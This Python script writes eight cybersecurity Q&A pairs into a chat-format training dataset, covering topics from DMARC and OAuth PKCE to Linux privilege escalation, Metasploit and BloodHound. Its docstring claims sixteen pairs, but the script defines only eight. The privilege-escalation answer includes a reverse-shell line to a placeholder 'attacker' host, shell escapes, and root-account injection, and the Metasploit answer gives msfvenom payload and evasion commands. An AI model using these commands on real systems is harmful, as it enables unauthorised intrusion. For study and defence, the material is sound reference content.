#!/usr/bin/env python3
"""gen_f_fill37.py -- final 16 pairs to reach 1001 total"""
import json, pathlib

OUT = pathlib.Path('/workspace/data_upgrades/upgrade_f.jsonl')
OUT.parent.mkdir(parents=True, exist_ok=True)

pairs = []
def p(q, a):
    pairs.append((q, a))

p("What is post-compromise Linux privilege escalation?",
  "Linux privilege escalation: escalate from limited shell to root after initial access; enumerate weak configurations. Enumeration: automated: linPEAS (linux-smart-enumeration): comprehensive; detects many privilege escalation vectors; run: ./linpeas.sh; LinEnum: similar; manual: id, whoami, uname -a (kernel version), cat /etc/os-release, env, history, sudo -l (what can user run as root?), cat /etc/passwd (usernames), ls -la /etc/shadow (world-readable?), find / -perm -4000 2>/dev/null (SUID binaries), crontab -l, cat /etc/crontab, find / -writable 2>/dev/null (writable files), ps aux (running processes), netstat -tlnp (listening services). Privilege escalation techniques: sudo misconfigurations: sudo -l shows: user ALL=(ALL) NOPASSWD: /usr/bin/vim; vim can be used to spawn root shell: sudo vim -c !sh; GTFOBins (gtfobins.github.io): catalogue of Unix binaries that can bypass restrictions; every sudo-allowed binary has GTFOBin entry if exploitable; SUID binaries: binary with SUID bit: runs as file owner (often root); find / -perm /4000 2>/dev/null; check each against GTFOBins: cp (SUID): copy /etc/passwd (writable); add root user; bash (SUID): bash -p (root shell); Cron jobs: writable script in crontab; echo /bin/bash -i >& /dev/tcp/attacker/4444 0>&1 >> /path/to/cron/script.sh; wait for cron execution; writable cron directory: drop script in /etc/cron.d/ or /etc/cron.daily/; PATH hijacking in cron: crontab runs script without full path; attacker-controlled directory in PATH before system directory; drop malicious version of called binary; NFS (Network File System): cat /etc/exports: no_root_squash means root on NFS client = root on server; mount NFS share from attacker machine; create SUID binary: cp /bin/bash .; chmod +s ./bash; execute on target: ./bash -p (root shell); kernel exploits: uname -r for kernel version; searchsploit kernel version; DirtyCow (CVE-2016-5195): works on many older kernels; careful: may crash system; Docker/container: running in Docker? cat /.dockerenv or mount output; Docker group membership: docker run -v /:/mnt --rm -it alpine chroot /mnt sh (root filesystem mounted inside container); writable Docker socket: docker run --rm -v /:/mnt busybox chroot /mnt sh; weak file permissions: /etc/passwd writable: add root user (hash from openssl passwd); /etc/sudoers writable: add user ALL=(ALL) NOPASSWD: ALL; world-writable /etc/cron.d/; LD_PRELOAD: sudo allowed with LD_PRELOAD preserved: create malicious shared library; sudo LD_PRELOAD=/tmp/evil.so binary; library runs as root before binary.")

p("What is network traffic analysis for anomaly detection?",
  "Network traffic anomaly detection: identify deviations from baseline network behaviour; detect attacks, C2, and data exfiltration without signatures. Baseline establishment: collect 2-4 weeks normal traffic; define normal: per host, per subnet, per application; metrics: bytes per hour, connections per hour, unique destinations, protocols used, DNS queries per hour, top talkers; seasonal patterns: business hours vs off-hours; weekly patterns; Statistical methods: mean + standard deviation: alert if metric exceeds mean + N*stdev; threshold: 3 sigma = 0.27% false positive rate; entropy: Shannon entropy for: DNS query character distribution (DGA detection = high entropy), HTTP User-Agent diversity, request destination diversity; percentile-based: alert if current value outside 1st-99th percentile of historical; time-series analysis: detect trends, seasonality, sudden changes; STL decomposition (Seasonal-Trend-Loess). Specific detection use cases: C2 beaconing: attacker implant checks in periodically; detect: periodic traffic to same destination, consistent packet sizes, regular intervals (Cobalt Strike default 60s); Fast Fourier Transform (FFT) on connection timing: detect periodic signal; tools: RITA (Real Intelligence Threat Analytics): open-source; beaconing and DNS tunneling detection from Zeek logs; beacon score per destination; DGA (Domain Generation Algorithm) detection: malware generates random domain names to find C2; detect: high-entropy domain names, many NXDomain (non-existent) responses in short time, new domains without history; ML: train classifier on domain name strings; lexical analysis (vowel ratio, n-gram frequency); tools: MLsec DGA classifier, Zeek DGA detection package; DNS tunneling: encode data in DNS queries; detect: unusually high query rate to single domain, unusually long query names, unusual query types (TXT, NULL), large DNS responses; Zeek dns.log: dns_query_type, query_len, answer_ttl. ML approaches: unsupervised: k-means clustering: cluster traffic; outliers are anomalies; autoencoders: train on normal traffic; high reconstruction error = anomaly; isolation forest: random forest detecting outliers; supervised: requires labeled attack data; more accurate but needs training data; network graph analysis: build graph of source-destination connections; nodes with unusual centrality or sudden change in degree = anomaly; tools: Zeek + Elastic stack; RITA; NetworkX for graph analysis; Suricata anomaly detection rules; Enterprise: Darktrace (unsupervised ML); ExtraHop Reveal(x) (ML-based network detection); Vectra AI (network threat detection); Corelight (Zeek enterprise + cloud integration).")

p("What is OAuth 2.0 PKCE flow and why is it important?",
  "PKCE (Proof Key for Code Exchange): extension to OAuth 2.0 authorization code flow; prevents authorization code interception attack; required for public clients. Why PKCE: public clients: mobile apps, SPAs (Single Page Apps), CLI tools; cannot securely store client_secret (decompiled, extracted); without PKCE: authorization code in redirect URL can be intercepted; malicious app on same device catches redirect; uses authorization code to get access token; PKCE prevents by binding code to original request. How PKCE works: client generates code_verifier: random 43-128 character string; code_challenge = BASE64URL(SHA256(code_verifier)); authorization request: include code_challenge and code_challenge_method=S256 in authorization URL; authorization server stores code_challenge; user authenticates; authorization code returned to client; token request: client includes code_verifier in token request; authorization server: SHA256(code_verifier) must equal stored code_challenge; if intercepted authorization code: attacker does not have code_verifier; cannot exchange code for token; code_challenge (hash) useless without original verifier. Implementation: authorization URL: https://auth.example.com/authorize?response_type=code&client_id=app&redirect_uri=app://callback&scope=openid&code_challenge=HASH&code_challenge_method=S256&state=random; token request POST: grant_type=authorization_code&code=AUTH_CODE&redirect_uri=app://callback&code_verifier=ORIGINAL_VERIFIER; client libraries: AppAuth (iOS, Android): implements PKCE automatically; MSAL (Microsoft): PKCE built-in; Auth0, Okta SDKs: PKCE supported; server requirements: authorization server must support PKCE; most modern OAuth servers do; PKCE required for: mobile apps (RFC 8252: OAuth for Native Apps), SPAs (RFC 9700: best practices); backend web apps: still use client_secret + PKCE for defence in depth; both mechanisms; PKCE should not replace client_secret for confidential clients; use both; state parameter: still required even with PKCE; prevents CSRF; different from code interception; bind state to session; validate state in callback. Security requirements: code_verifier: minimum 43 characters of cryptographic random; use crypto.getRandomValues (browser) or os.urandom (Python); S256 method mandatory (plain method provides no protection; never use plain in production).")

p("What is DMARC and email security?",
  "DMARC (Domain-based Message Authentication, Reporting and Conformance): email authentication policy; prevent domain spoofing; build on SPF and DKIM. Email authentication stack: SPF (Sender Policy Framework): DNS TXT record listing authorised sending IPs; example: v=spf1 include:_spf.google.com ip4:203.0.113.0/24 ~all; receiving server: check if sending IP is in SPF record; softfail (~all) or fail (-all); DKIM (DomainKeys Identified Mail): cryptographic signature added by sending MTA; DNS TXT record contains public key (selector._domainkey.example.com); receiving server verifies signature against DNS public key; ensures email not modified in transit; signature covers: specific headers and body hash; DMARC: policy stating what to do if SPF or DKIM fails; alignment: SPF domain must align with From header domain; DKIM signing domain must align with From header; policy options: p=none (monitor; do not reject), p=quarantine (send to spam), p=reject (reject email); reporting: rua (aggregate reports; daily; summary), ruf (forensic reports; per-failure; PII concerns). DMARC record example: v=DMARC1; p=reject; sp=reject; adkim=s; aspf=s; rua=mailto:dmarc@example.com; ruf=mailto:dmarc-forensic@example.com; pct=100; aspf=s (strict alignment: From domain must exactly match SPF domain); aspf=r (relaxed: subdomain OK); adkim: DKIM alignment; pct: percentage of email DMARC policy applied to (start with 25%, increase to 100%). DMARC deployment approach: start with p=none: collect reports; understand legitimate email flows; fix SPF and DKIM for all legitimate senders; move to p=quarantine (pct=25); gradually increase pct; move to p=reject pct=100 when confident; do not skip to reject immediately: may break legitimate email. Email authentication tools: DMARC report analysis: Dmarcian, Valimail, URIports, Postmark (free), MXToolbox; email authentication check: mail-tester.com, Google Admin Toolbox; MTA-STS: SMTP MTA Strict Transport Security; enforce TLS for email delivery; prevent downgrade; BIMI (Brand Indicators for Message Identification): requires p=quarantine or p=reject DMARC; display brand logo in email client; marketing benefit for security investment. Subdomain spoofing: subdomain of example.com can be spoofed if only example.com has DMARC; sp= in DMARC covers subdomains; set sp=reject to cover all subdomains; alternative: publish DMARC for each subdomain; wildcard DMARC: _dmarc.*.example.com not supported; use sp= on parent. Vendor email (third party sending email on behalf of domain): configure SPF to include vendor IP ranges; configure DKIM signing with vendor (vendor adds your DKIM key to their MTA); or use subdomain for vendor (vendor@marketing.example.com; separate DKIM key and SPF for marketing.example.com); preferred: separate subdomain per vendor; limit blast radius if vendor compromised.")

p("What is cloud security posture management (CSPM)?",
  "CSPM (Cloud Security Posture Management): continuously assess and remediate cloud infrastructure misconfigurations; enforce security policies across cloud accounts. Why CSPM: cloud infrastructure grows rapidly; manual configuration review impossible at scale; misconfigurations common cause of cloud breaches (S3 bucket exposed, security group open to world); CSPM: automated continuous scanning; detect misconfigurations; alert or auto-remediate; coverage: multi-cloud (AWS, Azure, GCP, OCI); infrastructure services (compute, storage, networking, IAM, database). CSPM capabilities: asset discovery: automatically discover all cloud resources across accounts and regions; shadow IT: find resources not in CMDB; configuration assessment: compare resource configuration to: CIS Benchmarks (AWS, Azure, GCP), regulatory standards (PCI DSS, HIPAA, SOC 2, GDPR), custom security policies; example checks: S3 bucket public access enabled, S3 versioning disabled, EC2 instance with public IP in production VPC, security group with 0.0.0.0/0 on SSH (port 22), IAM user with no MFA, RDS instance publicly accessible, EBS volume not encrypted, CloudTrail not enabled, root account used recently; remediation: alert: send finding to SIEM or ticketing; auto-remediate: Terraform or cloud API to fix configuration automatically (example: enable S3 versioning automatically); risk prioritisation: not all misconfigurations equally important; CSPM contextualises: is this S3 bucket actually internet-accessible and does it contain sensitive data?; network path analysis: is this security group open to internet AND attached to critical instance?; attack path analysis: identify sequences of misconfigurations enabling attack path from internet to sensitive data. Products: Prisma Cloud (Palo Alto Networks): most comprehensive; multi-cloud; CSPM + CWPP + CIEM; Wiz: highly rated; agentless; deep context; attack path analysis; Lacework: ML-based anomaly detection + CSPM; Orca Security: agentless; side-scanning; cloud-native; AWS Security Hub: AWS-only; aggregates findings from Config, GuardDuty, Inspector, Macie, IAM Access Analyzer; GCP Security Command Center: GCP-native; Azure Defender for Cloud (Security Center): Azure-native; Prowler: open-source multi-cloud; ScoutSuite: open-source multi-cloud; CloudMapper: AWS visualisation + security. Integration: CSPM findings to SIEM: alert routing; CSPM to ITSM: Jira/ServiceNow tickets per finding; CSPM to SOAR: auto-remediation playbooks; developer integration: infrastructure as code scan (pre-CSPM): Checkov checks Terraform before deployment; CSPM catches what slips through. CIEM (Cloud Infrastructure Entitlement Management): sibling to CSPM; focuses on IAM permissions; identify: overpermissive roles, unused permissions, cross-account risks; CSPM + CIEM together = comprehensive cloud security posture.")

p("What is the Metasploit Framework?",
  "Metasploit Framework: most widely used exploitation framework; open-source; Ruby-based; penetration testing and exploit development. Architecture: msfconsole: main command interface; Workspace: organise engagements; database backend (PostgreSQL); modules: exploits (vulnerability exploitation), payloads (code to run after exploitation), auxiliary (scanning, brute force, enumeration), post (post-exploitation), encoders (payload encoding), nops (NOP sleds for buffer overflow), evasion (AV evasion). Basic workflow: msfconsole; db_nmap -sV TARGET (Nmap scan saving to DB); search type:exploit platform:windows CVE-2017-0144 (search for EternalBlue); use exploit/windows/smb/ms17_010_eternalblue; show options; set RHOSTS 192.168.1.100; set LHOST 192.168.1.1; run (or exploit); post-exploitation: sessions -l (list sessions); sessions -i 1 (interact with session); load kiwi (Mimikatz integration); getsystem (privilege escalation); hashdump (dump NTLM hashes); Meterpreter: advanced post-exploitation agent; features: upload/download, run commands (shell), pivot (route through compromised host), port forwarding, capture keystrokes/screenshots, migrate process, persistence (run_as_service). Common modules: Scanners: auxiliary/scanner/smb/smb_ms17_010 (check EternalBlue vulnerability); auxiliary/scanner/portscan/tcp; Exploits: ms17_010_eternalblue (Windows SMB), MS08_067 (older Windows SMB), EternalRomance, BlueKeep (RDP CVE-2019-0708), ProxyShell (Exchange); Payloads: windows/x64/meterpreter/reverse_tcp (stageless: all in one), windows/x64/meterpreter_reverse_tcp (staged: small stager + download); msfvenom: payload generator; msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe > shell.exe; Evasion: encoders (shikata_ga_nai: polynomial encoder; signature detected by most AV); better: custom shellcode, C wrapper, in-memory execution; AV evasion: msfvenom --encrypt aes256; Metasploit Pro (commercial): automated exploitation, phishing campaigns, advanced reporting. Detection: Metasploit has recognisable signatures: JA3 TLS fingerprint for Meterpreter; default SSL certificate serial number; network behaviour; EDR: detect process injection; LSASS access; PowerShell encoded commands; Meterpreter memory signatures; YARA rules for Meterpreter; in modern environments: Metasploit payloads often detected; commercial C2 (Cobalt Strike, Havoc) used for stealth.")

p("What is a cybersecurity reading list for professionals?",
  "Cybersecurity reading list: authoritative books, resources, and continuous learning sources. Foundational books: The Web Application Hacker Handbook (Stuttard, Pinto): comprehensive web security reference; covers all web vulnerability classes with exploitation and defence; The Hacker Playbook series (Peter Kim): practical penetration testing; red team tactics; Social Engineering: The Science of Human Hacking (Christopher Hadnagy): social engineering techniques and defence; Penetration Testing (Georgia Weidman): beginner to intermediate pentesting; The Art of Intrusion (Mitnick): real-world attack stories; educational; Security Engineering (Ross Anderson): comprehensive security engineering from first principles; especially chapter on psychology of security; Silence on the Wire (Michal Zalewski): network security and passive reconnaissance. Advanced offensive: The Shellcoder Handbook (Anley et al.): binary exploitation deep dive; Hacking: The Art of Exploitation (Erickson): assembly, shellcode, exploits; A Guide to Kernel Exploitation (Perla, Oldani): kernel attack techniques; The Art of Memory Forensics (Ligh et al.): memory analysis and forensics; Rootkits and Bootkits (Matrosov): advanced persistent malware. Defensive: The Practice of Network Security Monitoring (Bejtlich): network security monitoring and analysis; Blue Team Handbook (Don Murdoch): defender reference; Applied Incident Response (Steve Anson): IR methodology; Red Team Development and Operations (Joe Vest): red team programme building. Standards and frameworks: NIST Special Publications (free): SP 800-53, SP 800-61, SP 800-115, SP 800-207; OWASP (free): Web Security Testing Guide (WSTG), Mobile Security Testing Guide (MSTG), Application Security Verification Standard (ASVS); MITRE ATT&CK (free): adversary tactics and techniques; CIS Controls (free with registration): prioritised security controls; SANS Reading Room (free): thousands of security papers on specific topics. Continuous learning: Krebs on Security (krebsonsecurity.com): investigative journalism on cybersecurity; Schneier on Security: expert commentary; threat intelligence blogs: CrowdStrike Intel, Mandiant, Palo Alto Unit 42, Recorded Future, Dragos; SANS Internet Stormcast (daily podcast: 5 minutes); Darknet Diaries (podcast): real attack stories; Black Hat and DEF CON talks: YouTube archives; key conferences: RSA, Black Hat, DEF CON, SANS CTI Summit, BSides (local), OffensiveCon; CTF (Capture The Flag): competitive hacking; learn by doing; platforms: PicoCTF, HackTheBox, TryHackMe, CTFtime.org; certifications roadmap: Security+ -> OSCP/GPEN -> (specialisation) cloud/DFIR/appsec.")

p("What is active directory reconnaissance with BloodHound?",
  "BloodHound: visualise Active Directory attack paths; graph-based analysis; find shortest path to Domain Admins; used by red teams and defenders. How it works: SharpHound (collector): run on domain-joined machine; collects AD data: users, groups, computers, GPOs, trusts, sessions (who is logged where), local admin rights; outputs JSON files; BloodHound (GUI): Neo4j graph database backend; import JSON; visualise AD as graph; nodes: users, computers, groups, domains, GPOs; edges: relationships (MemberOf, AdminTo, HasSession, CanRCE, WriteDACL, etc.); find attack paths: shortest path to Domain Admins from unprivileged user; attack path visualisation: click: Find Shortest Path to Domain Admins; BloodHound shows step-by-step: User A -> has session on Computer B -> local admin Computer C -> has ACL rights on Service Account D -> Service Account D MemberOf Domain Admins. Data collection with SharpHound: run as any domain user; SharpHound.exe --CollectionMethods All --OutputDirectory C:\\temp; collection methods: Default (fast; sessions may miss), All (everything; longer), Session (user sessions), ACL (permissions), Trusts (domain trusts), LocalAdmin (local admin rights); Invoke-BloodHound (PowerShell); BloodHound.py (Linux; remote collection via LDAP and SMB): bloodhound-py -u user -p password -d corp.com -c all -dc DC.corp.com. Built-in queries: Find All Domain Admins; Find Shortest Paths to Domain Admins; Find Principals with DCSync Rights; Find Computers Where Domain Users Are Local Admin; Find AS-REP Roastable Users; Find Kerberoastable High Value Targets; Find Computers With Unsupported Operating Systems; Shortest Paths from Kerberoastable Users; custom Cypher queries: MATCH (u:User)-[:AdminTo]->(c:Computer) WHERE u.enabled=true RETURN u,c (find users with local admin rights); MATCH (u:User)-[r:GenericAll|GenericWrite|WriteDACL|WriteOwner|ForceChangePassword|AllExtendedRights]->(n) WHERE NOT u.admincount RETURN u,r,n (ACL misconfigurations). Defensive use: run BloodHound internally (BloodHound Enterprise or free version); find and fix: tier-0 exposure (paths from unprivileged to Domain Admins), high-value target exposure, overprivileged accounts; BloodHound Enterprise (SpecterOps): continuous monitoring; alert when new path appears; compare snapshots; metrics: attack path exposure score. Defensive remediation based on BloodHound: break attack paths: remove unnecessary local admin rights, reduce ACL permissions, implement tiered access model, enable Protected Users group, reduce session exposure (privileged users log in to privileged workstations only).")

existing = sum(1 for _ in OUT.open()) if OUT.exists() else 0
print(f"Existing pairs: {existing}")
print(f"New pairs to add: {len(pairs)}")

with OUT.open("a") as f:
    for q, a in pairs:
        f.write(json.dumps({"messages": [
            {"role": "user", "content": q},
            {"role": "assistant", "content": a}
        ]}) + "\n")

total = sum(1 for _ in OUT.open())
print(f"Total upgrade_f pairs: {total}")
if total >= 1000:
    print("upgrade_f TARGET MET -- 1000+ pairs!")
else:
    print(f"Need {1000-total} more pairs")
